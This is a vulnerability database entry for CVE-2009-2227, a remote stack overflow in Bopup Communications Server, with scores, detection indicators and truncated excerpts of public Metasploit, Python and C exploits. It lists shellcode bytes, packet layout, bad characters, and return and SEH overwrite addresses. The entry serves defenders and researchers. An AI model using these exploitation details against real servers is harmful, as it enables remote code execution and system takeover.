CVE-2009-2227
Published 2009-06-26
CVSS 2.0: 10.0 (critical), vector AV:N/AC:L/Au:N/C:C/I:C/A:C
Exploit available. EPSS: 68.58% (99.3rd percentile)
Stack-based buffer overflow in B Labs Bopup Communication Server 3.2.26.5460 allows remote attackers to execute arbitrary code via a crafted request to TCP port 19810.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| blabsoft | bopup_communication_server | — | — |
Detection & IOCs (extracted from sources)
- bytes: \x81\xc4\xff\xef\xff\xff\x44
- bytes: \x01\x00\x00\x00
- bytes: \xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45
- Detect exploit attempts by monitoring TCP connections to port 19810 for a packet whose first 4 bytes are \x01\x00\x00\x00 followed by a large (roughly 829 bytes or more) payload; this is the characteristic structure of the Bopup Communications Server buffer overflow exploit.
- Payload bad characters for this exploit are \x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40; encoded shellcode on the wire will avoid these bytes, which can be used to tune IDS signatures.
- The Python PoC exploit sends a payload starting with \x01\x00\x00\x00 followed by 821 bytes of padding/shellcode, then 27 bytes of padding, a 5-byte call-back instruction, and a SEH overwrite; the total packet length is BOPUP_STR_OFFSET (0x19) + BOPUP_STR_LEN (0x348+8) bytes.
- The return addresses 0x0041add2 (Metasploit) and 0x00401DD5 (C PoC) are specific to Bopup Communications Server 3.2.26.5460 only; exploitation against other versions requires different offsets.
- The SEH overwrite address 0x004014E0 is described as 'universal' (p/p/r in bcssrvc) for the target version, but this may not hold across service pack levels or recompilations.
No detection rules found.
Exploit-DB (2010-05-09): Bopup Communications Server - Remote Buffer Overflow (Metasploit)
---
```ruby
##
# $Id: bopup_comm.rb 9262 2010-05-09 17:45:00Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	include Msf::Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Bopup Communications Server Buffer Overflow',
			'Description'    => %q{
				This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.
				By sending a specially crafted packet, an attacker may be
				able to execute arbitrary code.
			},
			'Author'         => [ 'MC' ],
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9262 $',
			'References'     =>
				[
					[ 'CVE', '2009-2227'
```
Exploit-DB (2009-06-29): Bopup Communications Server 3.2.26.5460 - Remote Buffer Overflow (SEH)
---
```python
#!/usr/bin/python
#[*] Usage : python bopup.py [target_ip]
sys.exit(0)
# win32_adduser - PASS=27 EXITFUNC=seh USER=dz Size=228 Encoder=PexFnstenvSub http://metasploit.com
shellcode=(
```
Exploit-DB (2009-06-22): Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
---
```c
/* bopup-down.c
 *
 * Copyright (c) 2008 by
 *
 * Bopup Communications Server remote SYSTEM exploit
 * by mu-b - Sat Feb 08 2008
 *
 * - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
 *
 * .text:00407A17 lea eax, [ebp+pkt_0x19]
 * .text:00407A1D push eax
 * .text:00407A1E lea eax, [ebp+var_354]
 * .text:00407A24 push eax
 * .text:00407A25 call _strcpy
 *
 * note: this is updated over time for newer versions, I can't be bothered
 * making it universal nor anything else...
 *
 * - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
 */
#include
#include
#include
#include
#include
#include
#include

#define BUF_SIZE 2048
#define BOPUP_STR_OFFSET 0x19
#define BOPUP_STR_LEN 0x348+8
#define
```
Metasploit: Bopup Communications Server Buffer Overflow
This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460. By sending a specially crafted packet, an attacker may be able to execute arbitrary code.
No writeups or analysis indexed.
References:
- http://osvdb.org/55275
- http://secunia.com/advisories/35516
- http://www.exploit-db.com/exploits/9002
- http://www.vupen.com/english/advisories/2009/1645
- https://exchange.xforce.ibmcloud.com/vulnerabilities/51305